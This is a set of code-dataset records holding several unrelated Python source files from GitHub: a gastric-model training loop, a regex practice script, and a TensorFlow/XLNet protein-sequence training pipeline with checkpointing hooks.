####################################################################################\r\n            for epoch in range(epoch_pre, n_epochs):\r\n                ####################################################################################\r\n                #\r\n                # Training stage\r\n                #\r\n                ####################################################################################\r\n                # self.param['batchsize'] = 8\r\n                ploss_all, pgene_4_cls_loss_all, pcox_value_all, pci_all = 0, 0, 0, 0\r\n                Train_Num = [i for i in range(np.shape(train_img_aug)[0])]\r\n                random.shuffle(Train_Num)\r\n                count = 0\r\n                for iq in range(np.shape(train_img_aug)[0] // self.param['batchsize']):\r\n                    train_final_input = train_img_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']],:, :, :]\r\n                    train_final_ISP = train_ISP_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']], :]\r\n                    train_final_DFS = train_DFS_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']]]\r\n                    train_final_st = train_st_aug[Train_Num[iq * self.param['batchsize']:(iq + 1) * self.param['batchsize']]]\r\n\r\n                    feed_dict = {self.x: train_final_input, self.ISP: train_final_ISP, self.DFS: train_final_DFS,self.st: train_final_st, self.drop: 0.5, self.epoch: epoch}\r\n\r\n                    _, ploss, pgene_4_cls_loss, pcox_value, pci = sess.run(\r\n                        [self.ADAM_opt, loss, gene_4_cls_loss, cox_value, ci], feed_dict)\r\n\r\n                    ploss_all += ploss\r\n                    pgene_4_cls_loss_all += pgene_4_cls_loss\r\n                    pci_all += pci\r\n                    pcox_value_all += pcox_value\r\n                    count += 1\r\n                    # print(plogit)\r\n\r\n                print('epoch:-' + str(epoch + 1) + '\\t' + 'ploss_all:' + str(\r\n                    ploss_all / count) + '\\t' + 'pgene_4_cls_loss_all:' + str(\r\n                    pgene_4_cls_loss_all / count) + '\\t' + 'pcox_value_all:' + str(\r\n                    pcox_value_all / count) + '\\t' + 'pci_all:' + str(\r\n                    pci_all / count) + '\\n')\r\n\r\n                
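# (epoch + 1) % 1 == 0 is always true, so a checkpoint is written after\r\n                # every epoch; increase the modulus to save less frequently.\r\n                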
if (epoch + 1) % 1 == 0:\r\n                    var_list = [var for var in tf.global_variables()]\r\n                    print(time.asctime(time.localtime(time.time())),\r\n                          'the %d-th iterations. Saving Models...' % epoch)\r\n                    ckpt.save_ckpt(sess=sess, mode_name='model.ckpt', save_dir=checkpoints_dir, global_step=epoch,\r\n                                   var_list=var_list)\r\n                    print(\"[*] Saving checkpoints SUCCESS! \")\r\n\r\n\r\nif __name__ == '__main__':\r\n    modelX = model()\r\n    modelX.train()\r\n","repo_name":"zzc623/ClassGastric","sub_path":"Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":25959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
+{"seq_id":"34039400737","text":"import os\nfrom contextlib import suppress\nimport re\n\ndef practise():\n\n    with suppress(FileNotFoundError):\n        # no error is raised even if the file does not exist\n        os.remove('test.txt')\n\n    sk = ('shinji', 'kawasaki', 80)\n    # sk[2] = 99 # tuples are immutable: raises TypeError\n    # print(sk)\n\ndef regex_practise():\n    sss = '54.5△'\n    _sss = re.sub(r'\\D\\Z', '', sss)\n    print(_sss)\n\n    pattern = re.compile(r'(\\d{3})-(\\d{3})-(\\d{3})')\n    mo = pattern.search('123-456-789')\n    print(mo.group(0))\n    print(mo.group(1))\n    print(mo.group(2))\n    print(mo.group(3))\n\n    _junk = pattern.match('123-456-789')\n    print(_junk.group(1))\n\ndef main():\n    # practise()\n    regex_practise()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"CyberMameCAN/Python-house","sub_path":"practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"86365356437","text":"r\"\"\"Entry point for training an XLNet-based model for AICUP2019 Task1.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport re\nimport sys\nimport ast\nimport csv\nimport glob\nimport gzip\nimport json\nimport math\nimport errno\nimport msgpack\nimport logging\nimport argparse\nimport datetime\nimport functools\nimport itertools\nfrom pathlib import Path\nfrom collections import defaultdict\n\n# print('some red text1', file=sys.stderr)\nimport colorama\nfrom colorama import Fore, Back, Style\n# print(Fore.RED + 'some red text2' + Style.RESET_ALL, file=sys.stderr)\ncolorama.init(\n) # this needs to run before first run of tf_logging._get_logger()\n# print(Fore.RED + 'some red text3' + Style.RESET_ALL, file=sys.stderr)\nimport tensorflow as tf\nimport tensorflow_hub as hub\n# print(Fore.RED + 'some red text4' + Style.RESET_ALL, file=sys.stderr)\nfrom tensorflow.python.ops import variables, inplace_ops\nfrom tensorflow.python.data.ops import iterator_ops\n# from tensorflow.contrib.data.python.ops.iterator_ops import _Saveable # 1.11\nfrom tensorflow.python.data.experimental.ops.iterator_ops import _Saveable # 1.12\nfrom tensorflow.core.util.event_pb2 import SessionLog\nfrom tensorflow.python.training import training_util\nfrom tensorflow.python.framework import meta_graph\nfrom tensorflow.python.data.util import nest\nfrom tensorflow.python.util.nest import is_sequence\nfrom tensorflow.contrib.layers.python.layers import adaptive_clipping_fn\nfrom tensorflow.contrib.rnn.python.ops import lstm_ops\nfrom tensorflow.core.protobuf import rewriter_config_pb2\nfrom tensorflow.python import debug as tf_debug\nfrom tensorflow.python.platform import tf_logging\nimport numpy as np\nimport coloredlogs\nfrom tqdm import tqdm\nfrom xlnet import xlnet\n\n_NEG_INF = -1e9\n\ntfversion = tuple([int(s) for s in 
tf.__version__.split('-')[0].split('.')])\n\n\ndef verify_input_path(p):\n # get absolute path to dataset directory\n path = Path(os.path.abspath(os.path.expanduser(p)))\n # doesn't exist\n if not path.exists():\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)\n # is dir\n if path.is_dir():\n raise IsADirectoryError(errno.EISDIR, os.strerror(errno.EISDIR), path)\n return path\n\n\ndef verify_output_path(p):\n # get absolute path to dataset directory\n path = Path(os.path.abspath(os.path.expanduser(p)))\n # existing file\n if path.exists():\n raise FileExistsError(errno.EEXIST, os.strerror(errno.EEXIST), path)\n # is dir\n if path.is_dir():\n raise IsADirectoryError(errno.EISDIR, os.strerror(errno.EISDIR), path)\n # assert dirs\n path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n return path\n\n\nclass TqdmFile(object):\n \"\"\" A file-like object that will write to tqdm\"\"\"\n file = None\n\n def __init__(self, file):\n self.file = file\n\n def write(self, x):\n # Avoid print() second call (useless \\n)\n if len(x.rstrip()) > 0:\n # print(Fore.RED + 'some red text' + Style.RESET_ALL)\n if tfversion[0] == 1 and tfversion[1] <= 12:\n tqdm.write(x, file=self.file)\n else:\n tqdm.write(x.rstrip(), file=self.file)\n\n def flush(self):\n return getattr(self.file, \"flush\", lambda: None)()\n\n\n# Disable cpp warnings\n# os.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n# Show debugging output, default: tf.logging.INFO\n\nlogger = None\nFLAGS = None\n\n\ndef pad_to_multiples(features, labels, pad_to_mutiples_of=8, padding_values=0):\n \"\"\"Nvidia Volta Tensor Cores are enabled when data shape is multiples of 8\n \"\"\"\n max_len = tf.shape(labels)[1]\n target_len = tf.cast(\n tf.multiply(\n tf.ceil(tf.truediv(max_len, pad_to_mutiples_of)), pad_to_mutiples_of\n ), tf.int32\n )\n paddings = [[0, 0], [0, target_len - max_len]]\n features['protein'] = tf.pad(\n tensor=features['protein'],\n paddings=paddings,\n constant_values=padding_values\n )\n return features, tf.pad(\n tensor=labels, paddings=paddings, constant_values=padding_values\n )\n\n\ndef bucket_by_sequence_length_and_pad_to_multiples(\n element_length_func,\n bucket_boundaries,\n bucket_batch_sizes,\n padded_shapes=None,\n padding_values=None,\n pad_to_mutiples_of=None,\n pad_to_bucket_boundary=False\n):\n \"\"\"A transformation that buckets elements in a `Dataset` by length.\n\n Nvidia Volta Tensor Cores are enabled when data shape is multiples of 8\n\n Elements of the `Dataset` are grouped together by length and then are padded\n and batched.\n\n This is useful for sequence tasks in which the elements have variable length.\n Grouping together elements that have similar lengths reduces the total\n fraction of padding in a batch which increases training step efficiency.\n\n Args:\n element_length_func: function from element in `Dataset` to `tf.int32`,\n determines the length of the element, which will determine the bucket it\n goes into.\n bucket_boundaries: `list<int>`, upper length boundaries of the buckets.\n bucket_batch_sizes: `list<int>`, batch size per bucket. Length should be\n `len(bucket_boundaries) + 1`.\n padded_shapes: Nested structure of `tf.TensorShape` to pass to\n @{tf.data.Dataset.padded_batch}. If not provided, will use\n `dataset.output_shapes`, which will result in variable length dimensions\n being padded out to the maximum length in each batch.\n padding_values: Values to pad with, passed to\n @{tf.data.Dataset.padded_batch}. 
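The dtypes should\n      match the corresponding dataset components (e.g. an int32 scalar for\n      integer-encoded sequences). 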
Defaults to padding with 0.\n pad_to_bucket_boundary: bool, if `False`, will pad dimensions with unknown\n size to maximum length in batch. If `True`, will pad dimensions with\n unknown size to bucket boundary, and caller must ensure that the source\n `Dataset` does not contain any elements with length longer than\n `max(bucket_boundaries)`.\n\n Returns:\n A `Dataset` transformation function, which can be passed to\n @{tf.data.Dataset.apply}.\n\n Raises:\n ValueError: if `len(bucket_batch_sizes) != len(bucket_boundaries) + 1`.\n \"\"\"\n with tf.name_scope(\"bucket_by_sequence_length_and_pad_to_multiples\"):\n if len(bucket_batch_sizes) != (len(bucket_boundaries) + 1):\n raise ValueError(\n \"len(bucket_batch_sizes) must equal len(bucket_boundaries) + 1\"\n )\n\n batch_sizes = tf.constant(bucket_batch_sizes, dtype=tf.int64)\n\n def element_to_bucket_id(*args):\n \"\"\"Return int64 id of the length bucket for this element.\"\"\"\n seq_length = element_length_func(*args)\n\n boundaries = list(bucket_boundaries)\n buckets_min = [np.iinfo(np.int32).min] + boundaries\n buckets_max = boundaries + [np.iinfo(np.int32).max]\n conditions_c = tf.logical_and(\n tf.less_equal(buckets_min, seq_length),\n tf.less(seq_length, buckets_max)\n )\n bucket_id = tf.reduce_min(tf.where(conditions_c))\n\n return bucket_id\n\n def window_size_fn(bucket_id):\n # The window size is set to the batch size for this bucket\n window_size = batch_sizes[bucket_id]\n return window_size\n\n def make_padded_shapes(shapes, none_filler=None):\n padded = []\n # print('shapes', shapes)\n for shape in nest.flatten(shapes):\n # print('shape', shape)\n shape = tf.TensorShape(shape)\n # print(tf.TensorShape(None))\n shape = [none_filler if d.value is None else d for d in shape]\n # print(shape)\n padded.append(shape)\n return nest.pack_sequence_as(shapes, padded)\n\n def batching_fn(bucket_id, grouped_dataset):\n \"\"\"Batch elements in dataset.\"\"\"\n # ({'protein': TensorShape(None), 'lengths': TensorShape([])}, TensorShape(None))\n print(grouped_dataset.output_shapes)\n batch_size = batch_sizes[bucket_id]\n none_filler = None\n if pad_to_bucket_boundary:\n err_msg = (\n \"When pad_to_bucket_boundary=True, elements must have \"\n \"length <= max(bucket_boundaries).\"\n )\n check = tf.assert_less(\n bucket_id,\n tf.constant(len(bucket_batch_sizes) - 1, dtype=tf.int64),\n message=err_msg\n )\n with tf.control_dependencies([check]):\n boundaries = tf.constant(bucket_boundaries, dtype=tf.int64)\n bucket_boundary = boundaries[bucket_id]\n none_filler = bucket_boundary\n # print(padded_shapes or grouped_dataset.output_shapes)\n shapes = make_padded_shapes(\n padded_shapes or grouped_dataset.output_shapes,\n none_filler=none_filler\n )\n return grouped_dataset.padded_batch(\n batch_size, shapes, padding_values\n )\n\n def _apply_fn(dataset):\n return dataset.apply(\n tf.contrib.data.group_by_window(\n element_to_bucket_id,\n batching_fn,\n window_size_func=window_size_fn\n )\n )\n\n return _apply_fn\n\n\ndef debug_serving():\n import tensorflow as tf\n import tensorflow.contrib.eager as tfe\n tf.enable_eager_execution()\n import numpy as np\n protein_strs = tf.constant(['FLI', 'MVPA', 'GS'])\n # <tf.Tensor: id=440, shape=(3,), dtype=string, numpy=array([b'FLI', b'MVPA', b'GS'], dtype=object)>\n proteins = [\n [aa_index[a] for a in np.array(ps).tolist().decode('utf-8')]\n for ps in protein_strs\n ]\n proteins = [[1, 2, 3], [4, 5, 1, 6], [1, 2]]\n np_proteins = [np.array(p, dtype=np.uint8) for p in proteins]\n\n def 
make_sequence_example(protein):\n # The object we return\n ex = tf.train.SequenceExample()\n # A non-sequential feature of our example\n # sequence_length = len(protein)\n # ex.context.feature[\"length\"].int64_list.value.append(sequence_length)\n # Feature lists for the two sequential features of our example\n fl_protein = ex.feature_lists.feature_list[\"protein\"]\n for aa in protein:\n fl_protein.feature.add().bytes_list.value.append(aa.tostring())\n return ex\n\n # make_sequence_example(np_proteins[0])\n # feature_lists {\n # feature_list {\n # key: \"protein\"\n # value {\n # feature {\n # bytes_list {\n # value: \"\\001\"\n # }\n # }\n # feature {\n # bytes_list {\n # value: \"\\002\"\n # }\n # }\n # feature {\n # bytes_list {\n # value: \"\\003\"\n # }\n # }\n # }\n # }\n # }\n # serialized = make_sequence_example(np_proteins[0]).SerializeToString()\n serialized = [\n make_sequence_example(npp).SerializeToString() for npp in np_proteins\n ]\n # b'\\x12\"\\n \\n\\x07protein\\x12\\x15\\n\\x05\\n\\x03\\n\\x01\\x01\\n\\x05\\n\\x03\\n\\x01\\x02\\n\\x05\\n\\x03\\n\\x01\\x03'\n context_features = {\n # 'length': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'protein': tf.FixedLenSequenceFeature([], dtype=tf.string)\n # uint8 is not in the list of allowed values: float, int64, string\n }\n example_names = ['t1', 'test2', 'aaa']\n context, sequence, lengths = tf.io.parse_sequence_example(\n serialized=serialized,\n # A vector (1-D Tensor) of type string containing binary serialized\n # serialized `SequenceExample` proto.\n context_features=context_features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values. These features are associated with a\n # `SequenceExample` as a whole.\n sequence_features=sequence_features,\n # A `dict` mapping feature keys to\n # `FixedLenSequenceFeature` or `VarLenFeature` values. 
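(here a single\n        # string feature per sequence step: the raw 'protein' bytes). 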
These features are\n # associated with data within the `FeatureList` section of the\n # `SequenceExample` proto.\n example_names=example_names,\n # A vector (1-D Tensor) of strings (optional), the name of\n # the serialized proto.\n name=None\n # A name for this operation (optional).\n )\n # context = {}\n # sequence = {'protein': <tf.Tensor: id=3, shape=(3, 4), dtype=string, numpy=\n # array([[b'\\x01', b'\\x02', b'\\x03', b''],\n # [b'\\x04', b'\\x05', b'\\x01', b'\\x06'],\n # [b'\\x01', b'\\x02', b'', b'']], dtype=object)>}\n # lengths = {'protein': <tf.Tensor: id=4, shape=(3,), dtype=int64, numpy=array([3, 4, 2], dtype=int64)>})\n mode = tf.estimator.ModeKeys.PREDICT\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n functools.partial(parse_sequence_example, mode=mode),\n num_parallel_calls=None\n )\n dataset = dataset.padded_batch(\n batch_size=10, padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = tf.data.experimental.get_single_element(dataset)\n # sequences = {'protein': <tf.Tensor: id=328, shape=(3, 4), dtype=int32, numpy=\n # array([[1, 2, 3, 0],\n # [4, 5, 1, 6],\n # [1, 2, 0, 0]])>, 'lengths': <tf.Tensor: id=327, shape=(3,), dtype=int32, numpy=array([3, 4, 2])>}\n iterator = tfe.Iterator(dataset)\n print(iterator.next())\n\n decoded = [\n tf.decode_raw(\n bytes=x, out_type=tf.uint8, little_endian=True, name=None\n ) for x in sequence['protein']\n ]\n\n\ndef make_sequence(protein):\n sequence = {}\n sequence['protein'] = tf.cast(x=protein, dtype=tf.int32, name=None)\n sequence['lengths'] = tf.shape(input=protein, name=None,\n out_type=tf.int32)[0]\n return sequence\n\n\ndef serving_input_str_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_protein_string_tensor'\n )\n mapping = tf.constant([x for x in aa_list])\n table = tf.contrib.lookup.index_table_from_tensor(\n mapping=mapping, num_oov_buckets=1, default_value=-1\n )\n receiver_tensors = {'protein_sequences': serialized}\n mode = tf.estimator.ModeKeys.PREDICT\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n lambda x: table.lookup(tf.string_split([x], delimiter=\"\").values)\n )\n dataset = dataset.map(make_sequence)\n # dataset = dataset.map(functools.partial(parse_sequence_example, mode=mode))\n dataset = dataset.padded_batch(\n batch_size=1000000, padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = tf.data.experimental.get_single_element(dataset)\n return tf.estimator.export.ServingInputReceiver(sequences, receiver_tensors)\n\n\ndef serving_input_dataset_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_example_tensor'\n )\n print_op = tf.print(\n \"serialized:\",\n serialized,\n serialized[0].dtype,\n output_stream=sys.stderr\n )\n # tf.logging.info(\"serialized:\", serialized, type(serialized[0]))\n receiver_tensors = {'sequences': serialized}\n mode = tf.estimator.ModeKeys.PREDICT\n with tf.control_dependencies([print_op]):\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n functools.partial(parse_sequence_example, mode=mode),\n num_parallel_calls=None\n )\n dataset = dataset.padded_batch(\n batch_size=1000000,\n padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = 
tf.data.experimental.get_single_element(dataset)\n return tf.estimator.export.ServingInputReceiver(\n sequences, receiver_tensors\n )\n\n\ndef serving_input_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_example_tensor'\n )\n receiver_tensors = {'sequences': serialized}\n context_features = {\n # 'length': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'protein': tf.FixedLenSequenceFeature([], dtype=tf.string)\n }\n context, sequence, lengths = tf.io.parse_sequence_example(\n serialized=serialized,\n # A scalar (0-D Tensor) of type string, a single binary\n # serialized `SequenceExample` proto.\n context_features=context_features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values. These features are associated with a\n # `SequenceExample` as a whole.\n sequence_features=sequence_features,\n # A `dict` mapping feature keys to\n # `FixedLenSequenceFeature` or `VarLenFeature` values. These features are\n # associated with data within the `FeatureList` section of the\n # `SequenceExample` proto.\n example_names=None,\n # A scalar (0-D Tensor) of strings (optional), the name of\n # the serialized proto.\n name=None\n # A name for this operation (optional).\n )\n sequence['protein'] = tf.decode_raw(\n bytes=sequence['protein'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n )\n # tf.Tensor: shape=(sequence_length, 1), dtype=uint8\n sequence['protein'] = tf.cast(\n x=sequence['protein'], dtype=tf.int32, name=None\n )\n # embedding_lookup expects int32 or int64\n # tf.Tensor: shape=(sequence_length, 1), dtype=int32\n sequence['protein'] = tf.squeeze(\n input=sequence['protein'],\n axis=[],\n # An optional list of `ints`. Defaults to `[]`.\n # If specified, only squeezes the dimensions listed. The dimension\n # index starts at 0. 
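(For this pipeline,\n        # axis=[1] would select the trailing size-1 axis noted above.) 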
It is an error to squeeze a dimension that is not 1.\n # Must be in the range `[-rank(input), rank(input))`.\n name=None\n )\n # tf.Tensor: shape=(sequence_length, ), dtype=int32\n # tf.Tensor: shape=(batch_size, sequence_length, ), dtype=int32\n # protein = tf.one_hot(protein, params.vocab_size)\n sequence['lengths'] = lengths['protein']\n return tf.estimator.export.ServingInputReceiver(sequence, receiver_tensors)\n\n\nclass EpochCheckpointInputPipelineHookSaver(tf.train.Saver):\n \"\"\"`Saver` with a different default `latest_filename`.\n\n This is used in the `CheckpointInputPipelineHook` to avoid conflicts with\n the model ckpt saved by the `CheckpointSaverHook`.\n \"\"\"\n def __init__(\n self,\n var_list,\n latest_filename,\n sharded=False,\n max_to_keep=5,\n keep_checkpoint_every_n_hours=10000.0,\n defer_build=False,\n save_relative_paths=True\n ):\n super(EpochCheckpointInputPipelineHookSaver, self).__init__(\n var_list,\n sharded=sharded,\n max_to_keep=max_to_keep,\n keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours,\n defer_build=defer_build,\n save_relative_paths=save_relative_paths\n )\n self._latest_filename = latest_filename\n\n def save(\n self,\n sess,\n save_path,\n global_step=None,\n latest_filename=None,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n ):\n return super(EpochCheckpointInputPipelineHookSaver, self).save(\n sess, save_path, global_step, latest_filename or\n self._latest_filename, meta_graph_suffix, write_meta_graph,\n write_state, strip_default_attrs\n )\n\n\nclass EpochCheckpointInputPipelineHook(tf.train.SessionRunHook):\n \"\"\"Checkpoints input pipeline state every N steps or seconds.\n\n This hook saves the state of the iterators in the `Graph` so that when\n training is resumed the input pipeline continues from where it left off.\n This could potentially avoid overfitting in certain pipelines where the\n number of training steps per eval are small compared to the dataset\n size or if the training pipeline is pre-empted.\n\n Differences from `CheckpointSaverHook`:\n 1. Saves only the input pipelines in the \"iterators\" collection and not the\n global variables or other saveable objects.\n 2. Does not write the `GraphDef` and `MetaGraphDef` to the summary.\n\n Example of checkpointing the training pipeline:\n\n ```python\n est = tf.estimator.Estimator(model_fn)\n while True:\n est.train(\n train_input_fn,\n hooks=[tf.contrib.data.CheckpointInputPipelineHook(est)],\n steps=train_steps_per_eval)\n # Note: We do not pass the hook here.\n metrics = est.evaluate(eval_input_fn)\n if should_stop_the_training(metrics):\n break\n ```\n\n This hook should be used if the input pipeline state needs to be saved\n separate from the model checkpoint. Doing so may be useful for a few reasons:\n 1. The input pipeline checkpoint may be large, if there are large shuffle\n or prefetch buffers for instance, and may bloat the checkpoint size.\n 2. If the input pipeline is shared between training and validation, restoring\n the checkpoint during validation may override the validation input\n pipeline.\n\n For saving the input pipeline checkpoint alongside the model weights use\n @{tf.contrib.data.make_saveable_from_iterator} directly to create a\n `SaveableObject` and add to the `SAVEABLE_OBJECTS` collection. Note, however,\n that you will need to be careful not to restore the training iterator during\n eval. 
You can do that by not adding the iterator to the SAVEABLE_OBJECTS\n collector when building the eval graph.\n \"\"\"\n def __init__(\n self,\n checkpoint_dir,\n config,\n save_timer=None,\n save_secs=None,\n save_steps=None,\n checkpoint_basename=\"input\",\n listeners=None,\n defer_build=False,\n save_relative_paths=True\n ):\n \"\"\"Initializes a `EpochCheckpointInputPipelineHook`.\n Creates a custom EpochCheckpointInputPipelineHookSaver\n\n Args:\n checkpoint_dir: `str`, base directory for the checkpoint files.\n save_timer: `SecondOrStepTimer`, timer to save checkpoints.\n save_secs: `int`, save every N secs.\n save_steps: `int`, save every N steps.\n checkpoint_basename: `str`, base name for the checkpoint files.\n listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n the checkpoint.\n config: tf.estimator.RunConfig.\n\n Raises:\n ValueError: One of `save_steps` or `save_secs` should be set.\n ValueError: At most one of saver or scaffold should be set.\n \"\"\"\n # `checkpoint_basename` is \"input.ckpt\" for non-distributed pipelines or\n # of the form \"input_<task_type>_<task_id>.ckpt\" for distributed pipelines.\n # Note: The default `checkpoint_basename` used by `CheckpointSaverHook` is\n # \"model.ckpt\". We intentionally choose the input pipeline checkpoint prefix\n # to be different to avoid conflicts with the model checkpoint.\n\n # pylint: disable=protected-access\n tf.logging.info(\"Create EpochCheckpointInputPipelineHook.\")\n self._checkpoint_dir = checkpoint_dir\n self._config = config\n self._defer_build = defer_build\n self._save_relative_paths = save_relative_paths\n\n self._checkpoint_prefix = checkpoint_basename\n if self._config.num_worker_replicas > 1:\n # Distributed setting.\n suffix = \"_{}_{}\".format(\n self._config.task_type, self._config.task_id\n )\n self._checkpoint_prefix += suffix\n # pylint: enable=protected-access\n\n # We use a composition paradigm instead of inheriting from\n # `CheckpointSaverHook` because `Estimator` does an `isinstance` check\n # to check whether a `CheckpointSaverHook` is already present in the list\n # of hooks and if not, adds one. Inheriting from `CheckpointSaverHook`\n # would thwart this behavior. This hook checkpoints *only the iterators*\n # and not the graph variables.\n self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)\n if save_timer:\n self._timer = save_timer\n else:\n self._timer = tf.train.SecondOrStepTimer(\n every_secs=save_secs, every_steps=save_steps\n )\n self._listeners = listeners or []\n self._steps_per_run = 1\n\n # Name for the protocol buffer file that will contain the list of most\n # recent checkpoints stored as a `CheckpointState` protocol buffer.\n # This file, kept in the same directory as the checkpoint files, is\n # automatically managed by the `Saver` to keep track of recent checkpoints.\n # The default name used by the `Saver` for this file is \"checkpoint\". Here\n # we use the name \"checkpoint_<checkpoint_prefix>\" so that in case the\n # `checkpoint_dir` is the same as the model checkpoint directory, there are\n # no conflicts during restore.\n self._latest_filename = self._checkpoint_prefix + '.latest'\n self._first_run = True\n\n def _set_steps_per_run(self, steps_per_run):\n self._steps_per_run = steps_per_run\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. 
The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n # Build a Saver that saves all iterators in the `GLOBAL_ITERATORS`\n # collection\n iterators = tf.get_collection(iterator_ops.GLOBAL_ITERATORS)\n saveables = [_Saveable(i) for i in iterators]\n self._saver = EpochCheckpointInputPipelineHookSaver(\n saveables,\n self._latest_filename,\n sharded=False,\n max_to_keep=self._config.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=self._config.\n keep_checkpoint_every_n_hours,\n defer_build=self._defer_build,\n save_relative_paths=self._save_relative_paths\n )\n\n self._summary_writer = tf.summary.FileWriterCache.get(\n self._checkpoint_dir\n )\n self._global_step_tensor = training_util._get_or_create_global_step_read(\n ) # pylint: disable=protected-access\n if self._global_step_tensor is None:\n raise RuntimeError(\n \"Global step should be created to use EpochCheckpointInputPipelineHook.\"\n )\n for l in self._listeners:\n l.begin()\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n global_step = session.run(self._global_step_tensor)\n self._timer.update_last_triggered_step(global_step)\n\n def _maybe_restore_input_ckpt(self, session):\n # Ideally this should be run in after_create_session but is not for the\n # following reason:\n # Currently there is no way of enforcing an order of running the\n # `SessionRunHooks`. Hence it is possible that the `_DatasetInitializerHook`\n # is run *after* this hook. That is troublesome because\n # 1. If a checkpoint exists and this hook restores it, the initializer hook\n # will override it.\n # 2. If no checkpoint exists, this hook will try to save an initialized\n # iterator which will result in an exception.\n #\n # As a temporary fix we enter the following implicit contract between this\n # hook and the _DatasetInitializerHook.\n # 1. The _DatasetInitializerHook initializes the iterator in the call to\n # after_create_session.\n # 2. This hook saves the iterator on the first call to `before_run()`, which\n # is guaranteed to happen after `after_create_session()` of all hooks\n # have been run.\n\n # Check if there is an existing checkpoint. If so, restore from it.\n # pylint: disable=protected-access\n latest_checkpoint_path = tf.train.latest_checkpoint(\n self._checkpoint_dir, latest_filename=self._latest_filename\n )\n if latest_checkpoint_path:\n self._get_saver().restore(session, latest_checkpoint_path)\n\n def before_run(self, run_context):\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. 
These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n if self._first_run:\n self._maybe_restore_input_ckpt(run_context.session)\n self._first_run = False\n return tf.train.SessionRunArgs(self._global_step_tensor)\n\n def after_run(self, run_context, run_values):\n stale_global_step = run_values.results\n if self._timer.should_trigger_for_step(\n stale_global_step + self._steps_per_run\n ):\n # get the real value after train op.\n global_step = run_context.session.run(self._global_step_tensor)\n if self._timer.should_trigger_for_step(global_step):\n self._timer.update_last_triggered_step(global_step)\n if self._save(run_context.session, global_step):\n run_context.request_stop()\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n\n # delete latest checkpoint file\n input_checkpoint_files = Path(self._checkpoint_dir\n ).glob(self._checkpoint_prefix + '*')\n # print(input_checkpoint_files)\n for f in input_checkpoint_files:\n if f.exists():\n f.unlink()\n # print('DELETE: ', f)\n tf.logging.debug(\"Removed input checkpoints\")\n\n last_step = session.run(self._global_step_tensor)\n for l in self._listeners:\n l.end(session, last_step)\n\n def _save(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n tf.logging.info(\n \"Saving\\033[31m input\\033[0m checkpoints for %d into %s.\", step,\n self._save_path\n )\n\n for l in self._listeners:\n l.before_save(session, step)\n\n self._get_saver().save(session, self._save_path, global_step=step)\n self._summary_writer.add_session_log(\n SessionLog(\n status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path\n ), # pylint: disable=no-member\n 